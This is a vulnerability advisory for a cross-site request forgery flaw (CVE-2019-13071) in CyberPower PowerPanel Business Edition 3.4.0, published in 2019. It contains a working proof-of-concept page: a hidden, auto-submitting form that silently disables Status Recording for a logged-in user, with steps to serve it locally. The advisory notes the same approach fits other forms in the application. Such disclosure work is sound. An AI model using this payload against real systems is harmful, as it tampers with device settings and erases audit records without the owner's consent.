CyberPower PowerPanel Business Edition 3.4.0 Cross-Site Request Forgery (CSRF) Vulnerability

Details

The Agent/Center component of PowerPanel Business Edition is vulnerable to
cross site request forgery. This can be exploited by tricking an
authenticated user into visiting a web page controlled by a malicious
person.

The following example uses CSRF to disable Status Recording under the Logs
/ Settings page. Create a file named ‘csrf.html’ on a local workstation
with the following contents:

<iframe style="display:none" name="csrf-frame"></iframe>
<div style="display: none;">
<form method='POST' action='http://(A VALID HOST
NAME):3052/agent/log_options' target="csrf-frame" id="csrf-form">
  <input type='hidden' name='value(recordingEnable)' value='no'>
  <input type='hidden' name='value(recordingInterval)' value='10'>
  <input type='hidden' name='value(periodToRemoveRecord)' value='2'>
  <input type='hidden' name='value(clearAllStatusLogs)' value='no'>
  <input type='hidden' name='value(type)' value='records'>
  <input type='hidden' name='value(action)' value='Apply'>
  <input type='hidden' name='value(button)' value='Apply'>
  <input type='submit' value='submit'>
</form>
</div>
<script>document.getElementById("csrf-form").submit()</script>

Serve the file using python or any other web server:

python -m SimpleHTTPServer 8000

Visit the local page in a browser while logged into PowerPanel Business
Edition:

http://localhost:8000/csrf.html

The hidden form is submitted in the background, and will disable Status
Recording. This could be adapted to exploit other forms in the web
application as well.

Vulnerable Systems:

PowerPanel Business Edition 3.4.0

CVE Information:

CVE-2019-13071

Disclosure Timeline:
Published Date:07/16/2019